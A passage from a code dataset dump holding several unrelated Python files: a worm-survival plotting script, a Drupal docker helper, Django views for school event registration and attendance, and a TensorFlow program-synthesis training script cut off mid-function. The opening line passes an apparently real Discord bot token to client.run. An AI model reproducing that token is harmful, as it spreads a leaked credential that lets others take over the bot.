entered_pronoun\r\n\r\nclient.run(\"NDU4OTM5ODI2NzY3NTI3OTM3.Dgu9xA.KKP9xq2SETNjij4aWHBmrUJ3Mo0\")","sub_path":"pronoun_bot_code.py","file_name":"pronoun_bot_code.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"455996076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 14 21:36:48 2020\n\n@author: Miyazaki\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os, sys\n\nfrom tkinter import filedialog\nimport tkinter \nfrom tkinter import messagebox\nfrom matplotlib.ticker import MaxNLocator\n\n\n####1, folder select####\nroot = tkinter.Tk()\nroot.withdraw()\n\nfld = filedialog.askdirectory()\nans = messagebox.askokcancel('Kaplan-Meier-single.py',\"start death analysis\")\nif ans==False:\n messagebox.showinfo('cancel', 'stop before analysis')\n sys.exit()\nos.chdir(fld)\nos.makedirs('../Death_analysis/CDF',exist_ok = True)\nos.makedirs('../Death_analysis/Distribution',exist_ok = True)\n\nlifetable_list = list(os.listdir(fld))\nlifetable_filename = []\n\nfor i in range(len(os.listdir((fld)))):\n lifetable_csv_filename = lifetable_list[i]\n #temp file name\n lifetable_filename_split = lifetable_list[i].split('.')\n lifetable_filename.append(\".\".join(lifetable_filename_split[0:-1]))\n\nfor j in lifetable_filename:\n tempsplit = j.split('_')\n strain_name_list = tempsplit[0: -1]\n strain_name = '_'.join(strain_name_list)\n data = pd.read_csv('../raw_datas/{}.csv'.format(strain_name))\n die_data = []\n for i in range(1,22):\n die_data.append(data[\"day{}_die\".format(i)].sum())\n fig1 =plt.figure(figsize =(8, 5), frameon=True, edgecolor=\"black\", linewidth=0)\n ax1 = fig1.add_subplot()\n plt.bar(range(1,22), die_data, color = 'gray')\n ax1.spines['top'].set_linewidth(0)\n ax1.spines['right'].set_linewidth(0)\n ax1.yaxis.set_major_locator(MaxNLocator(integer=True))\n plt.ylim(0,7)\n plt.ylabel('Number of Dead worms', fontsize = 20)\n plt.xlabel('Day', fontsize = 20)\n plt.savefig('../Death_analysis/Distribution/{}.png'.format(strain_name), bbox_inches=\"tight\")\n\n die_data = np.array(die_data)\n cdf = []\n for i in range(len(die_data)):\n if i == 0:\n cdf.append(die_data[i]/die_data.sum())\n else:\n temp = cdf[i-1] + die_data[i]/die_data.sum()\n cdf.append(temp)\n fig2 =plt.figure(figsize =(8, 5), frameon=True, edgecolor=\"black\", linewidth=0)\n ax2 = fig2.add_subplot()\n plt.plot(range(1,22), cdf, color = 'gray')\n ax2.spines['top'].set_linewidth(0)\n ax2.spines['right'].set_linewidth(0)\n plt.ylabel('Cumulative freq. dist.', fontsize = 20)\n plt.xlabel('Day', fontsize = 20)\n plt.ylim(0,1.1)\n plt.savefig('../Death_analysis/CDF/{}.png'.format(strain_name) , bbox_inches=\"tight\")","sub_path":"Data_analysis/Survival_analysis/Dead_worm_analysis/Deadworm_analysis.py","file_name":"Deadworm_analysis.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"95131760","text":"import os\nfrom docker_console import cmd_options\nfrom docker_console.web.engines.base.docker import BaseDocker\n\n\nclass Docker(BaseDocker):\n def __init__(self, config):\n super(Docker, self).__init__(config)\n\n def _get_volumes(self):\n volumes = []\n db_path = os.path.join(self.config.BUILD_PATH, self.config.DB[self.config.db_alias]['DUMP_IMPORT_FILE'])\n if db_path and os.path.islink(db_path):\n real_db_path = os.path.realpath(db_path)\n volumes.append('-v %s:%s' % (real_db_path, db_path.replace(self.config.BUILD_PATH, '/app/')))\n\n files_path = os.path.join(self.config.BUILD_PATH, self.config.DRUPAL[self.config.drupal_site]['FILES_ARCHIVE'])\n if files_path and os.path.islink(files_path):\n real_files_path = os.path.realpath(files_path)\n volumes.append('-v %s:%s' % (real_files_path, files_path.replace(self.config.BUILD_PATH, '/app/')))\n\n private_files_path = os.path.join(self.config.BUILD_PATH, self.config.DRUPAL[self.config.drupal_site]['PRIVATE_FILES_ARCHIVE'])\n if private_files_path and os.path.islink(private_files_path):\n real_private_files_path = os.path.realpath(private_files_path)\n volumes.append('-v %s:%s' % (real_private_files_path,\n private_files_path.replace(self.config.BUILD_PATH, '/app/')))\n\n # AWS mounts are required for example for cron run\n if cmd_options.with_aws_mounts:\n volumes.append('-v /opt/files:/opt/files')\n\n volumes.append('-v %s:%s' % (self.config.BUILD_PATH, '/app'))\n return ' '.join(volumes)\n\n def drush_run(self):\n if cmd_options.docker_drush_eval_run_code is None:\n # Use parameters starting only from 'drush' command position\n cmd = ' '.join(self.config.args[self.config.args.index('drush')+1:])\n else:\n cmd = \"ev '%s'\" % cmd_options.docker_drush_eval_run_code\n if cmd_options.docker_yes_all:\n cmd += ' -y'\n self.docker_drush(cmd)\n\n def docker_drush(self, cmd=''):\n uri = self.config.DRUPAL[self.config.drupal_site]['SITE_URI']\n self.docker_run('drush -r %s --uri=%s %s' % (os.path.join('/app', self.config.WEB['APP_LOCATION']), uri, cmd))\n","sub_path":"docker_console/web/engines/drupal7/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"470301039","text":"import csv\nfrom datetime import date, datetime\n\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core import serializers\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.serializers import json\nfrom django.forms import modelformset_factory, model_to_dict\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.urls import reverse_lazy, reverse\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import DeleteView\nfrom profiles.models import Profile\nfrom .models import Event, default_event_date, Registration, Block\nfrom .forms import EventForm, AttendanceForm, AttendanceFormSetHelper, RegistrationForm, LocationForm\n\n#Hello it's Me (Nandini)\n@staff_member_required\ndef location_create(request):\n form = LocationForm(request.POST or None)\n\n if form.is_valid():\n loc = form.save()\n messages.success(request, \"New location added: %s (%s)\" % (loc, loc.name))\n return redirect('events:create')\n\n context = {\n \"title\": \"Add new location\",\n \"form\": form,\n \"btn_value\": \"Save\"\n }\n return render(request, \"events/location_form.html\", context)\n\n\n@staff_member_required\ndef event_create(request):\n form = EventForm(request.POST or None)\n\n if form.is_valid():\n event = form.save(commit=False)\n event.creator = request.user\n event.save()\n form.save_m2m()\n\n msg = \"New event created for %s: %s\" % (event.date, event.title)\n\n num_duplicates = form.cleaned_data['duplicate']\n if num_duplicates:\n dupe_dates = event.copy(num_duplicates, user=request.user)\n # http://stackoverflow.com/questions/9052433/overriding-default-format-when-printing-a-list-of-datetime-objects\n msg += \"; duplicates made for %s.\" % ', '.join(map(str, dupe_dates))\n\n messages.success(request, msg)\n\n if not event.cache_remote_image():\n messages.warning(request, \"Failed to properly cache your image. Don't worry about it for now... unless \"\n \"you didn't provide an image link, in which case please let Tylere know!\")\n\n block_id = event.blocks.all()[0].id\n date_query = event.date\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n context = {\n \"title\": \"Create Event\",\n \"form\": form,\n \"btn_value\": \"Save\"\n }\n return render(request, \"events/event_form.html\", context)\n\n\n@staff_member_required\ndef event_update(request, id=None):\n event = get_object_or_404(Event, id=id)\n has_registrants = event.registration_set.all().exists()\n\n if has_registrants:\n regs_dict_by_block = {} # empty dict\n for block in Block.objects.all():\n regs_dict_by_block[block.id] = block.registration_set.filter(event=event).count()\n\n form = EventForm(request.POST or None, instance=event)\n\n # not valid?\n if form.is_valid():\n new_max_capacity = form.cleaned_data['max_capacity']\n if has_registrants and new_max_capacity < max(regs_dict_by_block.values()):\n messages.warning(request,\n \" You can't reduce the max capacity (%d) below the current number of registered students \"\n \"in a block (%d). If this is a problem, you can delete the event to boot \"\n \" all students, then recreate it with the capacity you want.\"\n \"\" % (new_max_capacity, max(regs_dict_by_block.values())))\n\n else:\n event = form.save(commit=False)\n event.save()\n form.save_m2m()\n\n msg = \"Edits saved for %s: %s\" % (event.date, event.title)\n num_duplicates = form.cleaned_data['duplicate']\n if num_duplicates:\n dupe_dates = event.copy(num_duplicates, user=request.user)\n # http://stackoverflow.com/questions/9052433/overriding-default-format-when-printing-a-list-of-datetime-objects\n msg += \"; duplicates made for %s.\" % ', '.join(map(str, dupe_dates))\n\n messages.success(request, msg)\n\n if not event.cache_remote_image():\n messages.warning(request, \"Failed to properly cache your image. Don't worry about it for now... unless \"\n \"you didn't provide an image link, in which case please let Tylere know!\")\n\n block_id = event.blocks.all()[0].id\n date_query = event.date\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n context = {\n \"title\": event.title,\n \"delete_btn\": True,\n \"event\": event,\n \"form\": form,\n \"btn_value\": \"Save\",\n \"has_registrants\": has_registrants,\n # \"regs_dict_by_block\": regs_dict_by_block,\n }\n return render(request, \"events/event_form.html\", context)\n\n\n@staff_member_required\ndef event_copy(request, id):\n new_event = get_object_or_404(Event, id=id)\n\n blocks = new_event.blocks.all()\n facilitators = new_event.facilitators.all()\n\n new_event.pk = None # autogen a new primary key (quest_id by default)\n new_event.date = None\n\n d = {'blocks': blocks,\n 'facilitators': facilitators,\n }\n\n form = EventForm(request.POST or None, instance=new_event, initial=d)\n\n # not valid?\n if form.is_valid():\n event = form.save()\n\n messages.success(request, \"New event created for %s: %s\" % (event.date, event.title))\n\n block_id = event.blocks.all()[0].id\n date_query = event.date\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n context = {\n \"title\": new_event.title,\n \"event\": new_event,\n \"form\": form,\n \"btn_value\": \"Save\"\n }\n return render(request, \"events/event_form.html\", context)\n\n\ndef event_detail(request, id=None):\n instance = get_object_or_404(Event, id=id)\n context = {\n \"title\": instance.title,\n \"event\": instance,\n }\n return render(request, \"events/event_detail.html\", context)\n\n\n# @staff_member_required\n# def event_delete(request, id=None):\n# event = get_object_or_404(Event, id=id)\n# registrants = event.registration_set\n# event.delete()\n# if registrants is not None:\n# messages.warning(request, \"You deleted an event that already had students registered for it. \"\n# \"You may want to notify the students: \" + registrants)\n# else:\n# messages.success(request, \"Successfully deleted\")\n# return redirect(\"events/events:list\")\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass EventDelete(DeleteView):\n model = Event\n success_url = reverse_lazy('events:manage')\n\n\n@staff_member_required\ndef event_manage(request):\n # date_query = request.GET.get(\"date\", str(default_event_date()))\n # d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n queryset = Event.objects.filter(facilitators=request.user)\n\n # for event in queryset:\n # for block in event.blocks.all():\n # event.attendance = {}\n # event.attendance = event.registration_set.filter().count()\n\n context = {\n # \"date_filter\": date_query,\n # \"date_object\": d,\n \"title\": \"Your Events\",\n \"object_list\": queryset,\n # \"date_filter\": d,\n }\n return render(request, \"events/event_management.html\", context)\n\n\n###############################################\n#\n# ATTENDANCE VIEWS\n#\n################################################\n\n@staff_member_required\ndef event_attendance_keypad(request, id, block_id=None, absent_value=True):\n event = get_object_or_404(Event, id=id)\n\n registrations = event.registration_set.all()\n registrations.update(absent=absent_value)\n event.is_keypad_initialized = absent_value\n event.save()\n return event_attendance(request, id, block_id)\n\n\n@staff_member_required\ndef event_attendance_keypad_disable(request, id, block_id=None):\n return event_attendance_keypad(request, id, block_id, absent_value=False)\n\n\n@staff_member_required\ndef event_attendance(request, id=None, block_id=None):\n event = get_object_or_404(Event, id=id)\n blocks = event.blocks.all()\n\n multi_block_save_option = blocks.count() > 1 and \\\n (event.multi_block_event == Event.F1_AND_F2 or event.multi_block_event == Event.F1_OR_F2)\n\n if block_id:\n active_block = get_object_or_404(Block, id=block_id)\n else:\n active_block = blocks[0]\n\n queryset1 = Registration.objects.filter(event=event, block=active_block).order_by('student__last_name')\n\n # https://docs.djangoproject.com/en/1.9/topics/forms/modelforms/#model-formsets\n AttendanceFormSet1 = modelformset_factory(Registration,\n form=AttendanceForm,\n extra=0)\n helper = AttendanceFormSetHelper()\n\n if request.method ==\"POST\":\n formset1 = AttendanceFormSet1(\n request.POST, request.FILES,\n queryset=queryset1,\n prefix='flex1'\n )\n if formset1.is_valid():\n formset1.save()\n messages.success(request, \"Attendance saved for %s during %s\" % (event, active_block))\n\n else:\n formset1 = AttendanceFormSet1(queryset=queryset1, prefix='flex1')\n\n context = {\n \"object_list_1\": queryset1,\n \"event\": event,\n \"formset1\": formset1,\n \"helper\": helper,\n \"active_block\": active_block,\n \"multi_block_save_option\": multi_block_save_option,\n }\n return render(request, \"events/attendance.html\", context)\n\n\ndef event_list(request, block_id=None):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n if block_id:\n active_block = get_object_or_404(Block, id=block_id)\n else:\n active_block = Block.objects.all()[0]\n\n blocks = Block.objects.all()\n blocks_json = serializers.serialize('json', blocks, fields=('id', 'name', ))\n\n queryset = active_block.event_set.filter(date=d, category__visible_in_event_list=True).select_related('location')\n\n registrations = {}\n excuses_dict = {}\n if request.user.is_authenticated() and not request.user.is_staff:\n # Build a dictionary of user's registrations for this day:\n # {block_name: event,}\n for block in blocks:\n registrations[block] = {}\n try:\n reg = Registration.objects.get(student=request.user, block=block, event__date=d)\n except Registration.DoesNotExist:\n reg = None\n\n # Are they excused?\n excuses = request.user.excuse_set.all().date(d).in_block(block)\n if excuses:\n registrations[block][\"excuse\"] = excuses[0]\n\n registrations[block][\"reg\"] = reg\n\n for event in queryset:\n event.attendance = event.registration_set.filter(block=active_block).count()\n if request.user.is_authenticated():\n event.available, event.already, event.explanation = event.is_available(request.user, active_block)\n else:\n event.available = True\n\n context = {\n \"date_filter\": date_query,\n \"date_object\": d,\n \"title\": \"List\",\n \"object_list\": queryset,\n \"registrations\": registrations,\n \"excuses\": excuses_dict,\n \"blocks_json\": blocks_json,\n \"blocks\": blocks,\n \"active_block\": active_block,\n }\n return render(request, \"events/event_list.html\", context)\n\n###############################################\n#\n# STAFF LOCATIONS\n#\n################################################\n\n@login_required\ndef staff_locations(request):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n users = User.objects.filter(is_staff=True, is_active=True).values('id', 'first_name', 'last_name')\n users = list(users)\n\n events = Event.objects.filter(date=d)\n\n for user in users:\n user_events = events.filter(facilitators__id=user['id'])\n\n for block in Block.objects.all():\n try:\n block_events = user_events.filter(blocks=block)\n user[block.constant_string()] = block_events\n except ObjectDoesNotExist:\n user[block.constant_string()] = None\n\n context = {\n \"date_filter\": date_query,\n \"date_object\": d,\n \"users\": users,\n }\n return render(request, \"events/staff.html\", context)\n\n###############################################\n#\n# SYNERVOICE VIEWS\n#\n################################################\n\n@staff_member_required\ndef generate_synervoice_csv(request, d, no_reg_only=False):\n def blocks_absent(s):\n str = \"\"\n sep = \"\"\n if 'FLEX1' in s:\n str += s['FLEX1']\n sep = \" \"\n if 'FLEX2' in s:\n str += sep + s['FLEX2']\n return str\n\n d_str = d.strftime(\"%y%m%d\")\n attendance_data = Registration.objects.all_attendance(d, no_reg_only)\n # A 9h column exists if the student was absent or didn't register\n # maybe check for key instead?\n absent_data = [s for s in attendance_data if len(s) > 8]\n\n filename = \"synervoice\"\n if no_reg_only:\n filename += \"-not-registered\"\n else:\n filename += \"-attendance\"\n filename += \"-%s.csv\" % d_str\n\n # https://docs.djangoproject.com/en/1.10/howto/outputting-csv/\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=' + filename\n\n writer = csv.writer(response)\n\n writer.writerow([\"Student Name\",\n \"Student Number\",\n \"Homeroom Teacher\",\n \"Grade\",\n \"Home Phone\",\n \"Home Email\",\n \"Date\",\n \"Flex-1 Status\",\n \"Flex-1 Event\",\n \"Flex-2 Status\",\n \"Flex-2 Event\",\n ])\n\n for s in absent_data:\n # hack to remove excused students\n if \"EX\" in s['FLEX1'] and \"EX\" in s['FLEX2']:\n # if present: \"PRESENT OR EXCUSED\" so also caught\n pass\n else:\n writer.writerow([s['last_name'] + \", \" + s['first_name'],\n s['username'],\n s['profile__homeroom_teacher'],\n s['profile__grade'],\n s['profile__phone'],\n s['profile__email'],\n d_str,\n s['FLEX1'],\n s['FLEX1_EVENT'],\n s['FLEX2'],\n s['FLEX2_EVENT'],\n # blocks_absent(s), # Add F regardless of whether absent or didn't register, one or both\n ])\n\n return response\n\n\n@staff_member_required\ndef synervoice(request):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n if request.method == \"POST\":\n event_date = request.POST.get(\"date\")\n d = datetime.strptime(event_date, \"%Y-%m-%d\").date()\n no_reg_only = False\n if request.POST.get('registration'):\n no_reg_only = True\n\n return generate_synervoice_csv(request, d, no_reg_only)\n\n context = {\n \"date_filter\": date_query,\n \"d\": d,\n }\n\n return render(request, \"events/synervoice.html\", context)\n\n\n###############################################\n#\n# REGISTRATION VIEWS\n#\n################################################\n@login_required\ndef registrations_list(request):\n queryset = Registration.objects.filter(student=request.user)\n context = {\n \"object_list\": queryset\n }\n return render(request, \"events/registration_list.html\", context)\n\n\n@login_required\ndef registrations_list(request):\n queryset = Registration.objects.filter(student=request.user)\n context = {\n \"object_list\": queryset\n }\n return render(request, \"events/registration_list.html\", context)\n\n\n@login_required\ndef register(request, id, block_id):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n event = get_object_or_404(Event, id=id)\n\n available = True # preset to True, then check both blocks, a conflict will switch this to False\n\n # block_id = 0 indicates register for all block in an optional OR event.\n both_on_or = False\n if block_id == '0':\n both_on_or = True\n for block in event.blocks.all():\n if available:\n available, already, reason = event.is_available(request.user, block)\n block_id = block.id # need to give it a valid id for page redirection. 0 not valid!\n else:\n block = get_object_or_404(Block, id=block_id)\n available, already, reason = event.is_available(request.user, block)\n\n block_text = \"\"\n if available:\n if event.both_required() or both_on_or:\n for block in event.blocks.all():\n Registration.objects.create_registration(event=event, student=request.user, block=block)\n block_text += str(block) + \" \"\n\n else:\n Registration.objects.create_registration(event=event, student=request.user, block=block)\n block_text = str(block)\n\n messages.success(request, \"Successfully registered for %s during %s \" % (event, block_text))\n else:\n messages.warning(request, \" %s\" % reason)\n return redirect(\"%s?date=%s\" % (reverse('events:list_by_block', args=(block_id,)), date_query))\n\n\n@login_required\ndef registrations_delete(request, id=None):\n reg = get_object_or_404(Registration, id=id)\n if reg.event.both_required():\n # maybe try/except instead?\n # Delete all records of this event (i.e. for all blocks)\n regs = Registration.objects.filter(event=reg.event, student=reg.student)\n regs.delete()\n else:\n reg.delete()\n messages.success(request, \"You've been removed from %s\" % reg.event)\n\n # Return to page that got us here.\n # http://stackoverflow.com/questions/12758786/redirect-return-to-same-previous-page-in-django\n # Don't do this with forms/POST\n if request.META: # this can be turned off, so need to check\n return redirect(request.META.get('HTTP_REFERER'))\n else:\n return redirect('events:registrations_list')\n\n\n@login_required\ndef registrations_manage(request):\n queryset = Registration.objects.filter(student=request.user)\n context = {\n \"object_list\": queryset\n }\n return render(request, \"events/registration_list.html\", context)\n\n\n@staff_member_required\ndef registrations_homeroom(request, user_id=None):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n if user_id:\n homeroom_teacher = get_object_or_404(User, id=user_id)\n else:\n homeroom_teacher = request.user\n\n students = Registration.objects.registration_check(d, homeroom_teacher)\n\n context = {\n \"heading\": \"Homeroom Students for \" + homeroom_teacher.get_full_name(),\n \"students\": students,\n \"date_filter\": date_query,\n \"date_object\": d,\n }\n return render(request, \"events/homeroom_list.html\", context)\n\n\n@staff_member_required\ndef registrations_all(request):\n date_query = request.GET.get(\"date\", str(default_event_date()))\n d = datetime.strptime(date_query, \"%Y-%m-%d\").date()\n\n students = Registration.objects.registration_check(d)\n\n context = {\n \"heading\": \"All Student Registrations\",\n \"students\": students,\n \"date_filter\": date_query,\n \"date_object\": d,\n \"include_homeroom_teacher\": 'true',\n }\n return render(request, \"events/homeroom_list.html\", context)\n","sub_path":"src/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"334070678","text":"import tensorflow as tf\nimport string as sn\n\n\n# The location on the disk of project\nPROJECT_BASEDIR = './'\n\n\n# The location on the disk of checkpoints\nCHECKPOINT_BASEDIR = (PROJECT_BASEDIR + \"Checkpoints/\")\n\n\n# The location on the disk of project\nDATASET_BASEDIR = PROJECT_BASEDIR\n\n\n# Filenames associated with program dataset\nDATASET_FILENAMES_PYTHON = [\n (DATASET_BASEDIR + \"epf_8_dataset.csv\")\n]\n\n\n# Locate dataset files on hard disk\nfor FILE_PYTHON in DATASET_FILENAMES_PYTHON:\n if not tf.gfile.Exists(FILE_PYTHON):\n raise ValueError('Failed to find file: ' + FILE_PYTHON)\n\n\n# Dataset configuration constants\nDATASET_IO_EXAMPLES = 10\nDATASET_COLUMNS = (DATASET_IO_EXAMPLES * 2) + 2\nDATASET_DEFAULT = \"0\"\n\n\n# Tokenization parameters for python\nDATASET_VOCABULARY = sn.printable\nDATASET_MAXIMUM = 64\n\n\n# Convert elements of python source code to one-hot token vectors\ndef tokenize_source_code_python(source_code_python, vocabulary=DATASET_VOCABULARY):\n\n # List allowed characters\n mapping_characters = tf.string_split([vocabulary], delimiter=\"\")\n\n\n # List characters in each word\n input_characters = tf.string_split([source_code_python], delimiter=\"\")\n\n\n # Convert integer lookup table\n lookup_table = tf.contrib.lookup.index_table_from_tensor(mapping=mapping_characters.values, default_value=0)\n\n\n # Query lookup table\n one_hot_tensor = tf.one_hot(lookup_table.lookup(input_characters.values), len(vocabulary), dtype=tf.float32)\n\n\n # Calculate actual sequence length\n actual_length = tf.size(one_hot_tensor) // len(vocabulary)\n\n\n # Pad input to match DATASET_MAXIMUM\n expanded_tensor = tf.pad(one_hot_tensor, [[0, (DATASET_MAXIMUM - actual_length)], [0, 0]])\n\n return tf.reshape(expanded_tensor, [DATASET_MAXIMUM, len(vocabulary)]), actual_length\n\n\n# Read single row words\ndef decode_record_python(filename_queue, num_columns=DATASET_COLUMNS, default_value=DATASET_DEFAULT):\n\n # Attach text file reader\n DATASET_READER = tf.TextLineReader(skip_header_lines=1)\n\n\n # Read single line from dataset\n key, value_text = DATASET_READER.read(filename_queue)\n\n\n # Decode line to columns of strings\n name_column, *example_columns, function_column = tf.decode_csv(value_text, [[default_value] for i in range(num_columns)])\n\n\n # Convert IO examples from string to float32\n example_columns = tf.string_to_number(tf.stack(example_columns), out_type=tf.float32)\n\n\n # Convert python code to tokenized one-hot vectors\n program_tensor, actual_length = tokenize_source_code_python(function_column)\n\n return name_column, example_columns, program_tensor, actual_length\n\n\n# Batch configuration constants\nBATCH_SIZE = 32\nNUM_THREADS = 4\nTOTAL_EXAMPLES = 2015538\nEPOCH_SIZE = TOTAL_EXAMPLES // BATCH_SIZE\n\n\n# Generate batch from rows\ndef generate_batch(name, examples, program, length, batch_size=BATCH_SIZE, num_threads=NUM_THREADS, shuffle_batch=True):\n\n # Shuffle batch randomly\n if shuffle_batch:\n\n # Construct batch from queue of records\n name_batch, examples_batch, program_batch, length_batch = tf.train.shuffle_batch(\n [name, examples, program, length],\n batch_size=batch_size,\n num_threads=num_threads,\n capacity=TOTAL_EXAMPLES,\n min_after_dequeue=(TOTAL_EXAMPLES // 1000))\n\n\n # Preserve order of batch\n else:\n\n # Construct batch from queue of records\n name_batch, examples_batch, program_batch, length_batch = tf.train.batch(\n [name, examples, program, length],\n batch_size=batch_size,\n num_threads=num_threads,\n capacity=TOTAL_EXAMPLES)\n\n return name_batch, examples_batch, program_batch, length_batch\n\n\n\n# Generate single training batch of python programs\ndef training_batch_python():\n\n # A queue to generate batches\n filename_queue = tf.train.string_input_producer(DATASET_FILENAMES_PYTHON)\n\n\n # Decode from string to floating point\n name, examples, program, length = decode_record_python(filename_queue)\n\n\n # Combine example queue into batch\n name_batch, examples_batch, program_batch, length_batch = generate_batch(name, examples, program, length)\n\n return name_batch, examples_batch, program_batch, length_batch\n\n\n# Prefix model nomenclature\nPREFIX_RNN = \"rnn\"\nPREFIX_DENSE = \"dense\"\nPREFIX_SOFTMAX = \"softmax\"\nPREFIX_TOTAL = \"total\"\nPREFIX_GENERATOR = \"generator\"\nPREFIX_SYNTAX = \"syntax\"\nPREFIX_BEHAVIOR = \"behavior\"\n\n\n# Extension model nomenclature\nEXTENSION_NUMBER = (lambda number: \"_\" + str(number))\nEXTENSION_LOSS = \"_loss\"\nEXTENSION_WEIGHTS = \"_weights\"\nEXTENSION_BIASES = \"_biases\"\nEXTENSION_OFFSET = \"_offset\"\nEXTENSION_SCALE = \"_scale\"\nEXTENSION_ACTIVATION = \"_activation\"\nEXTENSION_COLUMN = \"_column\"\n\n\n# Collection model nomenclature\nCOLLECTION_LOSSES = \"losses\"\nCOLLECTION_PARAMETERS = \"parameters\"\nCOLLECTION_ACTIVATIONS = \"activations\"\n\n\n# Initialize trainable parameters\ndef initialize_weights_cpu(name, shape, standard_deviation=0.01, decay_factor=None):\n\n # Force usage of cpu\n with tf.device(\"/cpu:0\"):\n\n # Sample weights from normal distribution\n weights = tf.get_variable(\n name,\n shape,\n initializer=tf.truncated_normal_initializer(\n stddev=standard_deviation,\n dtype=tf.float32),\n dtype=tf.float32)\n\n # Add weight decay to loss function\n if decay_factor is not None:\n\n # Calculate decay with l2 loss\n weight_decay = tf.multiply(\n tf.nn.l2_loss(weights),\n decay_factor,\n name=(name + EXTENSION_LOSS))\n tf.add_to_collection(COLLECTION_LOSSES, weight_decay)\n\n return weights\n\n\n# Initialize trainable parameters\ndef initialize_biases_cpu(name, shape):\n\n # Force usage of cpu\n with tf.device(\"/cpu:0\"):\n\n # Sample weights from normal distribution\n biases = tf.get_variable(\n name,\n shape,\n initializer=tf.constant_initializer(1.0),\n dtype=tf.float32)\n\n return biases\n\n\n# Compute corrected tokenized code with rnn\ndef inference_generator_python(program_batch):\n\n # Placeholder weights for computation check\n generator_weights = initialize_weights_cpu((PREFIX_GENERATOR + EXTENSION_WEIGHTS), program_batch.shape)\n\n return program_batch * generator_weights\n\n\n# Compute behavior function with rnn\ndef inference_behavior_python(program_batch):\n\n # Placeholder weights for computation check\n behavior_weights = initialize_weights_cpu((PREFIX_BEHAVIOR + EXTENSION_WEIGHTS), [BATCH_SIZE])\n\n\n # Compute expected output given input example\n def behavior_function(input_example):\n\n return input_example * behavior_weights\n\n return behavior_function\n\n\n# Hidden size of LSTM recurrent cell\nLSTM_SIZE = len(DATASET_VOCABULARY) * 2\n\n\n# Compute syntax label with brnn\ndef inference_syntax_python(program_batch, length_batch):\n\n # Define forward and backward rnn layers\n lstm_forward = tf.contrib.rnn.LSTMCell(LSTM_SIZE)\n lstm_backward = tf.contrib.rnn.LSTMCell(LSTM_SIZE)\n initial_state = lstm_forward.zero_state(BATCH_SIZE, tf.float32)\n\n \n # Compute rnn activations\n output_batch, state_batch = tf.nn.bidirectional_dynamic_rnn(\n lstm_forward, \n lstm_backward, \n program_batch,\n initial_state_fw = initial_state,\n initial_state_bw = initial_state,\n sequence_length=length_batch,\n dtype=tf.float32)\n\n\n # Take linear combination of hidden states and produce syntax label\n softmax_w = initialize_weights_cpu((PREFIX_SOFTMAX + EXTENSION_WEIGHTS), [DATASET_MAXIMUM, LSTM_SIZE*2])\n softmax_b = initialize_biases_cpu((PREFIX_SOFTMAX + EXTENSION_BIASES), [1])\n logits = tf.add(tf.tensordot(tf.concat(output_batch, 2), softmax_w, 2), softmax_b)\n\n return logits\n\n\n# Compute loss for syntax discriminator\ndef loss(prediction, labels):\n\n # Calculate huber loss of prediction\n huber_loss = tf.losses.huber_loss(labels, prediction)\n\n\n # Calculate the mean loss across batch\n huber_loss_mean = tf.reduce_mean(huber_loss)\n tf.add_to_collection(COLLECTION_LOSSES, huber_loss_mean)\n\n return huber_loss_mean\n\n\n# Hyperparameters\nINITIAL_LEARNING_RATE = 0.001\nDECAY_STEPS = 10 * EPOCH_SIZE\nDECAY_FACTOR = 0.95\n\n\n# Compute loss gradient and update parameters\ndef train(total_loss):\n\n # Keep track of current training step\n global_step = tf.train.get_or_create_global_step()\n\n\n # Decay learning rate\n learning_rate = tf.train.exponential_decay(\n INITIAL_LEARNING_RATE,\n global_step,\n DECAY_STEPS,\n DECAY_FACTOR,\n staircase=True)\n\n\n # Create optimizer for gradient updates\n optimizer = tf.train.AdamOptimizer(learning_rate)\n\n\n # Minimize loss using optimizer\n gradient = optimizer.minimize(total_loss, global_step=global_step)\n\n return gradient\n\n\n# Run single training cycle on dataset\ndef train_epf_8(num_epoch=10):\n\n # Watch compute time per batch\n from time import time\n from datetime import datetime\n\n\n # Convert epoch to batch steps\n num_steps = num_epoch * EPOCH_SIZE\n\n\n # Create new graph\n with tf.Graph().as_default():\n\n # Compute single training batch\n name_batch, examples_batch, program_batch, length_batch = training_batch_python()\n\n\n # Compute corrected code\n corrected_batch = inference_generator_python(program_batch)\n\n\n # Compute syntax of corrected code\n syntax_batch = inference_syntax_python(corrected_batch, length_batch)\n syntax_loss = loss(syntax_batch, tf.constant([1. for i in range(BATCH_SIZE)], tf.float32))\n\n\n # Compute behavior of corrected code\n behavior_batch = inference_behavior_python(corrected_batch)\n for n in 